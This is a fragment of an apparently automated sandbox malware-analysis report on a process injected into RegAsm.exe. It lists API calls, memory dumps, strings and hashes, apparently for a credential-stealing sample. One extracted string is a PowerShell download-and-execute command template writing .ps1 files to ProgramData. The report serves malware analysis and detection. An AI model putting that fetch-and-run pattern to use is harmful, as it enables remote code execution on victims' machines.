                                                                                                                                                                                                                                                    • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C736073
                                                                                                                                                                                                                                                    • _dup.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C736082
                                                                                                                                                                                                                                                    • _fdopen.API-MS-WIN-CRT-MATH-L1-1-0(00000000,6C75148E), ref: 6C736091
                                                                                                                                                                                                                                                    • __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,Qml,00000000,?), ref: 6C7360BA
                                                                                                                                                                                                                                                    • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C7360C4
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: PrintfTarget@mozilla@@$?vprint@DebugDebuggerOutputPresentString__acrt_iob_func__stdio_common_vfprintf_dup_fdopen_filenofclose
                                                                                                                                                                                                                                                    • String ID: Qml
                                                                                                                                                                                                                                                    • API String ID: 3835517998-3226739177
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413643
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00413655
                                                                                                                                                                                                                                                      • Part of subcall function 00411530: SHGetFolderPathA.SHELL32(00000000,^iB,00000000,00000000,?,00000000), ref: 00411568
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 00413681
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015D20F0), ref: 004136A0
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 004136B4
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015D2018), ref: 004136C8
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 004114D0: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,004216C8,000000FF,?,0040E60A,?,00000000,00000000,00000000,?,?), ref: 004114F7
                                                                                                                                                                                                                                                      • Part of subcall function 0040CCC0: StrStrA.SHLWAPI(00000000,015D1FB8,?,?,?,?,?,?,?,?,?,?,?,00421360,?), ref: 0040CD2B
                                                                                                                                                                                                                                                      • Part of subcall function 0040CCC0: memcmp.MSVCRT ref: 0040CD69
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000), ref: 00406D97
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DAD
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DC8
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DE1
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                                                                                      • Part of subcall function 004117F0: GlobalAlloc.KERNEL32(00000000,Y7A,?,?,?,00413759,?,?), ref: 004117FB
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(00000000,015D23F0), ref: 00413765
                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0041383A
                                                                                                                                                                                                                                                      • Part of subcall function 00406E30: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004063BB,00000000,00000000), ref: 00406E57
                                                                                                                                                                                                                                                      • Part of subcall function 00406E30: LocalAlloc.KERNEL32(00000040,00000000,?,004063BB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406E66
                                                                                                                                                                                                                                                      • Part of subcall function 00406E30: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004063BB,00000000,00000000), ref: 00406E7D
                                                                                                                                                                                                                                                      • Part of subcall function 00406E30: LocalFree.KERNEL32(?,?,004063BB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406E8C
                                                                                                                                                                                                                                                      • Part of subcall function 00406FF0: memcmp.MSVCRT ref: 0040702B
                                                                                                                                                                                                                                                      • Part of subcall function 00406FF0: memset.MSVCRT ref: 00407059
                                                                                                                                                                                                                                                      • Part of subcall function 00406FF0: LocalAlloc.KERNEL32(00000040,?), ref: 00407090
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 004137DE
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0042717D,?,?,?,?,000003E8), ref: 004137FB
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00413816
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,004274DC), ref: 00413822
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$AllocFileLocal$memset$BinaryCryptFreeGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4228189460-0
                                                                                                                                                                                                                                                    • Opcode ID: 730461f6d4f296029eb596b3e359c770bc36bcc04cdaa6c0a4af3b74bb9cd58d
                                                                                                                                                                                                                                                    • Instruction ID: 60534eda8287e98b898d0e3664bec52c239fb42f48bc9c26b5b1b3f58eb20c38
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 730461f6d4f296029eb596b3e359c770bc36bcc04cdaa6c0a4af3b74bb9cd58d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4371A8B5D00219ABCB10EFA5CC85EEE7779AF58704F00456EF605B3281DB78AB44CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrlenA.KERNEL32(?,?,?,?,?,?,004214E9,000000FF,?,00418113,?,015C2E10,?), ref: 0040FECC
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcpy.KERNEL32(00000000), ref: 0040FEF7
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE90: lstrcat.KERNEL32(?,?), ref: 0040FF01
                                                                                                                                                                                                                                                      • Part of subcall function 0040FDB0: lstrcpy.KERNEL32(00000000), ref: 0040FDF0
                                                                                                                                                                                                                                                      • Part of subcall function 00411310: GetSystemTime.KERNEL32(?,015CF0B0,004270A0,?,00000000,00000008,?,?,00000000,004216B1,000000FF,?,0040452E,0041F9D9,00000014), ref: 00411365
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcpy.KERNEL32(00000000), ref: 0040FE63
                                                                                                                                                                                                                                                      • Part of subcall function 0040FE00: lstrcat.KERNEL32(?,00000000), ref: 0040FE6F
                                                                                                                                                                                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 004133BA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                                                                                    • String ID: Invoke-Expression (Invoke-WebRequest -Uri "$" -UseBasicParsing).Content$"" $*.ps1$.ps1$<$C:\ProgramData\$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    • API String ID: 2215929589-186952963
                                                                                                                                                                                                                                                    • Opcode ID: 03dd2e9e34d802dea5d29cfa6423f1f3d9152ac0f25e9dd2332ea9cdd86388b5
                                                                                                                                                                                                                                                    • Instruction ID: 4104a353c020ab22266f5ef7065de420a7a79c03b59ae824b4d38d852fc73c37
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 03dd2e9e34d802dea5d29cfa6423f1f3d9152ac0f25e9dd2332ea9cdd86388b5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAD17F31C15248EACB15EBE5C956ADEBBB86F14304F1040BEE506336D2DA782B0CDB75
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DEB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6DEB83
                                                                                                                                                                                                                                                    • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?), ref: 6C7191F4
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: GetCurrentProcess.KERNEL32(?,6C6D31A7), ref: 6C70CBF1
                                                                                                                                                                                                                                                      • Part of subcall function 6C70CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6D31A7), ref: 6C70CBFA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                                                                                                                                                                                                    • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                                                                                                                                                                                                    • API String ID: 3790164461-3347204862
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6FC5A3
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32 ref: 6C6FC9EA
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6C6FC9FB
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6C6FCA12
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6FCA2E
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C6FCAA5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                                                                                                                                                                                    • String ID: (null)$0
                                                                                                                                                                                                                                                    • API String ID: 4074790623-38302674
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C71483A,?), ref: 6C6D4ACB
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C71483A,?), ref: 6C6D4AE0
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C71483A,?), ref: 6C6D4A82
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: mozalloc_abort.MOZGLUE(?), ref: 6C6ECAA2
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C71483A,?), ref: 6C6D4A97
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C71483A,?), ref: 6C6D4A35
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(-00000023,?,?,?,?,6C71483A,?), ref: 6C6D4A4A
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C71483A,?), ref: 6C6D4AF4
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C71483A,?), ref: 6C6D4B10
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,?,6C71483A,?), ref: 6C6D4B2C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
                                                                                                                                                                                                                                                    • String ID: :Hql
                                                                                                                                                                                                                                                    • API String ID: 4251373892-2994437733
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6FC784
                                                                                                                                                                                                                                                    • _dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C6FC801
                                                                                                                                                                                                                                                    • _dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6C6FC83D
                                                                                                                                                                                                                                                    • ?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C6FC891
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
                                                                                                                                                                                                                                                    • String ID: INF$NAN$inf$nan
                                                                                                                                                                                                                                                    • API String ID: 1991403756-4166689840
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C6D3492
                                                                                                                                                                                                                                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C6D34A9
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C6D34EF
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6C6D350E
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6D3522
                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C6D3552
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C6D357C
                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C6D3592
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: EnterCriticalSection.KERNEL32(6C75E370,?,?,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284), ref: 6C70AB94
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: LeaveCriticalSection.KERNEL32(6C75E370,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C70ABD1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                                                                                                                                                                                    • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 3634367004-706389432
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1192971331-0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(75AA5460,?,75AA5460,00000000,?,0040BE25,0040C630,?,0040C630,?,75AA5460,00000000), ref: 0040BCCF
                                                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040BCE5
                                                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040BD16
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(75AA5460,?,?,?,?,?,0040BE25,0040C630,?,0040C630,?,75AA5460,00000000), ref: 0040BD36
                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,0040BE25,0040C630,?,0040C630,?,75AA5460,00000000), ref: 0040BD47
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040BE25,0040C630,?,0040C630,?,75AA5460,00000000), ref: 0040BD4E
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(75AA5460,?,?,?,?,?,0040BE25,0040C630,?,0040C630,?,75AA5460,00000000), ref: 0040BD5E
                                                                                                                                                                                                                                                    • strcpy_s.MSVCRT ref: 0040BD8A
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrlen$Heapstrchr$AllocProcessstrcpy_s
                                                                                                                                                                                                                                                    • String ID: 0123456789ABCDEF
                                                                                                                                                                                                                                                    • API String ID: 4020929367-2554083253
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C6E9675
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E9697
                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C6E96E8
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C6E9707
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C6E971F
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C6E9773
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: EnterCriticalSection.KERNEL32(6C75E370,?,?,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284), ref: 6C70AB94
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: LeaveCriticalSection.KERNEL32(6C75E370,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C70ABD1
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C6E97B7
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C6E97D0
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32 ref: 6C6E97EB
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C6E9824
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                                                                                                                                                                                                    • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                    • API String ID: 409848716-3880535382
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004274D0), ref: 00416BDC
                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004274D4), ref: 00416BF6
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015CF750), ref: 00416C34
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015CF5A0), ref: 00416C48
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416C5C
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416C6A
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,004274D8), ref: 00416C7C
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 00416C90
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000), ref: 00406D97
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DAD
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DC8
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406DE1
                                                                                                                                                                                                                                                      • Part of subcall function 00406D60: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C83D,?,00000000,?,00000000,?,00000000), ref: 00406E09
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: Sleep.KERNEL32(000003E8,004221C1,004162C0,?,?,?,00000001), ref: 00415315
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: CreateThread.KERNEL32(00000000,00000000,00413C30,?,00000000,00000000), ref: 00415336
                                                                                                                                                                                                                                                      • Part of subcall function 00415250: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00415342
                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 00416D31
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00416D40
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
